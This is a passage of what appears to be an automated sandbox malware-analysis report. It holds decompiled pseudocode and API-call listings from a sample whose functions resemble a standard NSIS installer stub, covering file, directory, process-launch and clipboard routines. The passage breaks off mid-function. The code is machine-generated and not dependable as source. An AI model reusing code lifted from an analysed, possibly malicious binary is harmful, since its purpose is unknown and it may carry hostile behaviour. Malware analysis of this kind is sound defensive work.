				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                    0x00406138
                    0x0040613e
                    0x00406143
                    0x0040614c
                    0x0040614c
                    0x00406155

                    APIs
                    • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                    • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                    • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                    • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                    0x00405c1c
                    0x00405c24
                    0x00000000
                    0x00405c2a
                    0x00000000

                    APIs
                    • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                    • GetLastError.KERNEL32 ref: 00405C2A
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: CreateDirectoryErrorLast
                    • String ID:
                    • API String ID: 1375471231-0
                    • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                    • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                    • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                    • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040620A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040620A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                    0x0040620e
                    0x0040621e
                    0x00406226
                    0x00000000
                    0x0040622d
                    0x00000000
                    0x0040622f

                    APIs
                    • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040E579,0040CEF0,00403579,0040CEF0,0040E579,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                    • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                    • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004061DB Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004061DB(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                    0x004061df
                    0x004061ef
                    0x004061f7
                    0x00000000
                    0x004061fe
                    0x00000000
                    0x00406200

                    APIs
                    • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                    • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                    • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                    0x00403606
                    0x0040360c

                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                    0x00401faa
                    0x00401faf
                    0x00401fb5
                    0x00401fba
                    0x00401fbe
                    0x0040292e
                    0x00401fc4
                    0x00401fc7
                    0x00401fca
                    0x00401fd2
                    0x00401fe1
                    0x00401fe3
                    0x00401fe3
                    0x00401fd4
                    0x00401fd8
                    0x00401fd8
                    0x00401fd2
                    0x00401fea
                    0x00401feb
                    0x00401feb
                    0x00402c2d
                    0x00402c39

                    APIs
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                      • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                      • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                      • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                      • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                    • String ID:
                    • API String ID: 2972824698-0
                    • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                    • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                    • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                    • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 95%
                    			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                    0x00405811
                    0x00405817
                    0x00405821
                    0x00405824
                    0x004059ba
                    0x004059de
                    0x004059de
                    0x004059f1
                    0x00405a0f
                    0x00405a11
                    0x00405a19
                    0x00405a6f
                    0x00405a73
                    0x00000000
                    0x00000000
                    0x00405a75
                    0x00405a7b
                    0x00000000
                    0x00000000
                    0x00405a85
                    0x00405a8d
                    0x00405a90
                    0x00405b92
                    0x00000000
                    0x00405b92
                    0x00405a9f
                    0x00405aaa
                    0x00405ab3
                    0x00405abe
                    0x00405ac1
                    0x00405aca
                    0x00405ad0
                    0x00405ad3
                    0x00405ad3
                    0x00405aeb
                    0x00405af4
                    0x00405af7
                    0x00405afe
                    0x00405b05
                    0x00405b0d
                    0x00405b0d
                    0x00405b24
                    0x00405b24
                    0x00405b2b
                    0x00405b31
                    0x00405b3d
                    0x00405b44
                    0x00405b4d
                    0x00405b4f
                    0x00405b52
                    0x00405b61
                    0x00405b64
                    0x00405b6a
                    0x00405b6b
                    0x00405b71
                    0x00405b72
                    0x00405b73
                    0x00405b7b
                    0x00405b86
                    0x00405b8c
                    0x00405b8c
                    0x00000000
                    0x00405aeb
                    0x00405a21
                    0x00405a51
                    0x00405a59
                    0x00405a64
                    0x00405a64
                    0x00405a6a
                    0x00000000
                    0x00405a6a
                    0x00405a25
                    0x00405a2f
                    0x00000000
                    0x004059f3
                    0x004059f9
                    0x00405a34
                    0x00000000
                    0x00405a3d
                    0x00405a02
                    0x00405a07
                    0x00405a0a
                    0x00000000
                    0x00405a0a
                    0x004059f1
                    0x0040582a
                    0x0040582e
                    0x00405836
                    0x0040583a
                    0x0040583d
                    0x00405840
                    0x00405843
                    0x00405846
                    0x00405847
                    0x00405848
                    0x00405861
                    0x00405864
                    0x0040586e
                    0x0040587d
                    0x00405885
                    0x0040588d
                    0x00405892
                    0x00405895
                    0x004058a1
                    0x004058aa
                    0x004058b3
                    0x004058d5
                    0x004058db
                    0x004058ec
                    0x004058f1
                    0x004058ff
                    0x0040590d
                    0x0040590d
                    0x00405912
                    0x00405920
                    0x00405920
                    0x00405925
                    0x00405928
                    0x0040592d
                    0x00405939
                    0x00405942
                    0x0040594f
                    0x0040595e
                    0x00405951
                    0x00405956
                    0x00405956
                    0x0040596a
                    0x0040596a
                    0x0040597e
                    0x00405987
                    0x00405990
                    0x004059a0
                    0x004059ac
                    0x004059ac
                    0x00000000

                    APIs
                    • GetDlgItem.USER32 ref: 00405867
                    • GetDlgItem.USER32 ref: 00405876
                    • GetClientRect.USER32 ref: 004058B3
                    • GetSystemMetrics.USER32 ref: 004058BA
                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                    • ShowWindow.USER32(?,00000008), ref: 00405956
                    • GetDlgItem.USER32 ref: 00405977
                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                    • GetDlgItem.USER32 ref: 00405885
                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                    • GetDlgItem.USER32 ref: 004059C9
                    • CreateThread.KERNEL32 ref: 004059D7
                    • CloseHandle.KERNEL32(00000000), ref: 004059DE
                    • ShowWindow.USER32(00000000), ref: 00405A02
                    • ShowWindow.USER32(?,00000008), ref: 00405A07
                    • ShowWindow.USER32(00000008), ref: 00405A51
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                    • CreatePopupMenu.USER32 ref: 00405A96
                    • AppendMenuW.USER32 ref: 00405AAA
                    • GetWindowRect.USER32 ref: 00405ACA
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                    • OpenClipboard.USER32(00000000), ref: 00405B2B
                    • EmptyClipboard.USER32 ref: 00405B31
                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                    • GlobalLock.KERNEL32 ref: 00405B47
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                    • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                    • SetClipboardData.USER32 ref: 00405B86
                    • CloseClipboard.USER32 ref: 00405B8C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: H7B${
                    • API String ID: 590372296-2256286769
                    • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                    • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                    • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                    • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404AB5 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422720;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405CAC(0x3fb, _t146);
					E004068EF(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
